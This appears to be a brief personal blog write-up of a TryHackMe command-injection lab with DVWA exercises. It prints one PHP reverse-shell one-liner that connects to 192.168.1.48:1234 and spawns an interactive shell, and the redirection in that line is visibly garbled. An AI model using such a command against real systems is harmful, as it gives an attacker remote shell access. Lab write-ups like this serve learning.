Skip to main content
XsiSec.com
HomeReposBlogProjectsPortfolio
© 2026 XsiSec.com
Security rules |security.txt
Updated 2026-08-15 · v1.0.0+2026-08-14.82f92cb · 82f92cb
← Back to overview
Security article

Command Injection Part 2 TryHackMe | Owasp Top 10

Command Injection Part 2 TryHackMe | Owasp Top 10: Finally covered all the sessions of command injection for TryToHackMe though I didnt really learn anything at alll but I still wanted to see if there was something that I could improve • Security • Command injection • command-injection, security

2021-11-262 tags
Tags

Finally covered all the sessions of command injection for TryToHackMe though I didnt really learn anything at alll but I still wanted to see if there was something that I could improve

in the example we made use of a php shell

php -r '$sock=fsockopen("192.168.1.48",1234); exec("/bin/sh -i &3 2>&3");'

quite simple example 

 

then afterwards I they was few exercises within  Damn Vulnerable Web Application (DVWA) v1.8

 

nothing that particular some php code just...

Search
Explore

Popular tags

Browse all 30 tags

Comments

0 comments

No comments yet — be the first to comment.